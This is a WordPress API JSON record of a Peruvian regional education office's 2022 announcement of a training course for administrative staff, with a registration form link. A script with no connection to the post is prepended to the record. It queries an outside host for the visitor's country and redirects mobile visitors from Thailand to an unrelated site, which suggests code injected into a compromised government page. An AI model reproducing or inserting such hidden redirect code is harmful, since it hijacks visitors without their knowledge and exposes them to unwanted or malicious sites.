<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":2433,"date":"2022-11-30T10:45:47","date_gmt":"2022-11-30T15:45:47","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=2433"},"modified":"2022-11-30T10:45:47","modified_gmt":"2022-11-30T15:45:47","slug":"ugel-norte-brindara-curso-para-trabajadores-administrativos-del-ambito-territorial","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/ugel-norte-brindara-curso-para-trabajadores-administrativos-del-ambito-territorial\/","title":{"rendered":"UGEL NORTE BRINDAR\u00c1 CURSO PARA TRABAJADORES ADMINISTRATIVOS DEL \u00c1MBITO TERRITORIAL."},"content":{"rendered":"\n<p>Se pone conocimiento que a partir del d\u00eda jueves 01 de diciembre se estar\u00e1 realizando la capacitaci\u00f3n de personal administrativo de la UGEL NORTE.<br>La capacitaci\u00f3n estar\u00e1 a cargo de la UNIVERSIDAD LA SALLE y la certificaci\u00f3n ser\u00e1 por 120 hrs. <\/p>\n\n\n\n<p>Para inscribirse lo debe realizar en el siguiente link (cupos limitados) que estar\u00e1 abierto hasta el d\u00eda MIERCOLES 30 de noviembre.<\/p>\n\n\n\n<p>LINK INSCRIPCI\u00d3N: <a href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSeIK45rCWqqIly9azQcUrs1h46OweOzRmdzOvbhVVHsHSPDwQ\/viewform\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSeIK45rCWqqIly9azQcUrs1h46OweOzRmdzOvbhVVHsHSPDwQ\/viewform<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se pone conocimiento que a partir del d\u00eda jueves 01 de diciembre se estar\u00e1 realizando la capacitaci\u00f3n de personal administrativo de la UGEL NORTE.La capacitaci\u00f3n estar\u00e1 a cargo de la UNIVERSIDAD LA SALLE y la certificaci\u00f3n ser\u00e1 por 120 hrs. Para inscribirse lo debe realizar en el siguiente link (cupos limitados) que estar\u00e1 abierto hasta [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2433","post","type-post","status-publish","format-standard","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2433","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=2433"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2433\/revisions"}],"predecessor-version":[{"id":2434,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2433\/revisions\/2434"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=2433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=2433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=2433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}